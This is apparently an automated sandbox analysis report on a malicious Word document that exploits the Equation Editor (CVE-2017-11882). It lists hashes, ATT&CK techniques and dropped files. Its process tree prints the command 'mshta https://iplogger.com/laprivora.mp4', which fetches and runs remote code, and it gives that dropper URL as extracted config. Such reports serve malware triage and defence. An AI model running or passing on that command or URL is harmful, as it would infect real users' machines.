739a04027cec7a22c5e9b9fdb0553f2670d79ae391199635982a30ffcfb19198

General

Target

739a04027cec7a22c5e9b9fdb0553f2670d79ae391199635982a30ffcfb19198.docx
Size

30KB
MD5

1cc038dc09e9ecbd7b1a5cb6590f3d9b
SHA1

2e3006dcb8bb9512c7e3c5944c6b63ccbce4a68e
SHA256

739a04027cec7a22c5e9b9fdb0553f2670d79ae391199635982a30ffcfb19198
SHA512

2db80d90a0f303cfc15a8365e596c71402afa1c69e5a7e398c3580774ec31527b5854fe081006e3950a6b1d242715aa6714a0831669f98507422d750b957af59
SSDEEP

768:Q/9GQuF5JL8CJaiT45rj+Gl7YNkq+zOn4kk:Q1GQu5h8CJai8517YqFok

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://iplogger.com/laprivora.mp4

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
9	1080	mshta.exe
10	1080	mshta.exe
11	1080	mshta.exe
12	1080	mshta.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
520	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4159544280-4273523227-683900707-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1832	WINWORD.EXE

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1832	WINWORD.EXE
1832	WINWORD.EXE
1832	WINWORD.EXE

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1832 wrote to memory of 2720	1832	WINWORD.EXE	1
PID 1832 wrote to memory of 2720	1832	WINWORD.EXE	1
PID 1832 wrote to memory of 2720	1832	WINWORD.EXE	1
PID 1832 wrote to memory of 2720	1832	WINWORD.EXE	1
PID 520 wrote to memory of 1080	520	EQNEDT32.EXE	31
PID 520 wrote to memory of 1080	520	EQNEDT32.EXE	31
PID 520 wrote to memory of 1080	520	EQNEDT32.EXE	31
PID 520 wrote to memory of 1080	520	EQNEDT32.EXE	31

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
1⤵
PID:2720

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\739a04027cec7a22c5e9b9fdb0553f2670d79ae391199635982a30ffcfb19198.docx"
1⤵
- Drops file in Windows directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1832

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:520
- C:\Windows\SysWOW64\mshta.exe
  mshta https://iplogger.com/laprivora.mp4
  2⤵
  - Blocklisted process makes network request
  - Modifies Internet Explorer settings
  PID:1080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
6e13468cfad36ec1703bdb216c985bda

SHA1
b5589c058baf649655aac87a6520674c578d00e5

SHA256
2a83ee2a2c569cfaf4fcd46d67fd1d6ad0704bcd413df77f4da80501ee49a309

SHA512
2e771c50aea2292868ab1f6350ca5ba416c47cc22b21cd676a8372a80d1092988efe8072382f2bae324c838f405b3098c5635952fed6f710230e7bef236e6978

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{04B2231A-EB95-43C5-B761-1B05FB56A878}.FSD

Filesize
128KB

MD5
da6478b9877e71565f6d26c55a2fa997

SHA1
fba3e99e97331fd9e756bbed148a6e0828d4d1f9

SHA256
e842cb08949a386f7cf79e008e28d8a5826b8bf3d7968f8aebf3970f4760ac69

SHA512
6f0cb8980d7ec45826135559293713a2f0d4522ecedf7bf5c688691def039a4b8c76c5100a430c2b41c40ec49057c2272dede69a528240cad0e390aa31d08075

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U6AGJ71Z\zakaz[1].rtf

Filesize
768KB

MD5
f5c6e8b64cf0e89fdec3471aa76c5ac9

SHA1
548ceee1b31bfe4d1beaad0d59667f8b11cdb10f

SHA256
2f789b8d720fc21aec9b93231125f4434312b08a328e7519dc5045fd6d906f03

SHA512
d6426930c7f881137a3a55a0303247b81480a41063641326a7bb63fdab987d3861113cabeda850991148cd8477c01d13a4da676e75fed683836db7d5a910b7a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\{FBF5DEF0-C318-4578-BD00-E51E1DD325C6}

Filesize
128KB

MD5
fc36592e043fc6586e2585df06ed4cd7

SHA1
94a0739284be036c8f969ee2d9d0d014ae969b6d

SHA256
612b1413bc190f00895e1254567d105863dfe7a220e39a7eab7013e0899e1504

SHA512
1334ca7182763c3cd163ea2828e9fb825a0be5714d6569c0eeb4c80205886d759788b73b1db38747c1bd86bba0561ce3a48541614ce17e9a37fd50b887fee0c6

Download Submit
memory/1832-56-0x0000000070B9D000-0x0000000070BA8000-memory.dmp

Filesize
44KB

Download
memory/1832-55-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1832-54-0x000000002F090000-0x000000002F1ED000-memory.dmp

Filesize
1.4MB

Download
memory/1832-143-0x000000002F090000-0x000000002F1ED000-memory.dmp

Filesize
1.4MB

Download
memory/1832-144-0x0000000070B9D000-0x0000000070BA8000-memory.dmp

Filesize
44KB

Download

Analysis

Sharing